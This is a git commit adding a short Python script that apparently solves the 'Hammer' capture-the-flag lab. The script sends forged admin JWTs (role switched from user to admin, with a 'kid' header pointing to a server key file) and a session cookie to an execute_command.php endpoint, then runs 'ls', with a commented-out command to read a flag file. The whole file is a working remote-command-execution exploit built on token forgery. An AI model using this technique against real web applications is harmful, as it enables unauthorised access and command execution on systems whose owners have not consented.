initial commit

CTF/Hammer/script.py

@@ -0,0 +1,34 @@
+import requests
+
+IP = '10.10.150.76'
+url = f"http://{IP}:1337/execute_command.php"
+session = "2t8g5kvcql31qk5iuvpgegkki7"
+token_user = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L215a2V5LmtleSJ9.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjQ1MTA3LCJleHAiOjE3NjEyNDg3MDcsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJ1c2VyIn19.9hrG4miaa7txtC0CaXt0UJsv0Cg4aSKmCD8m6CG9qts'
+token_admin = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L2h0bWwvMTg4YWRlMS5rZXkifQ.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjQ1NjUwLCJleHAiOjE3NjEyNDkyNTAsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJhZG1pbiJ9fQ.Hk_RgyXnBqyBYYzpkkJ-4KqclFfMNqLs41TxJOtRcGE'
+
+headers = {
+    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0',
+    'Accept': '*/*',
+    'Accept-Language': 'en-US,en;q=0.5',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/json',
+    'X-Requested-With': 'XMLHttpRequest',
+    'Origin': f"http://{IP}:1337",
+    'DNT': '1',
+    'Sec-GPC': '1',
+    'Connection': 'keep-alive',
+    'Referer': f"http://{IP}:1337/dashboard.php",
+    'Cookie': f"PHPSESSID={session}; token={token_admin}; persistentSession=no",
+    'Priority': 'u=0',
+    'Authorization': f"Bearer {token_admin}"
+}
+
+data = {
+#    'command': 'cat /home/ubuntu/flag.txt'
+    'command': 'ls'
+}
+
+print(headers)
+
+response = requests.post(url, headers=headers, data=data)
+print(response.json())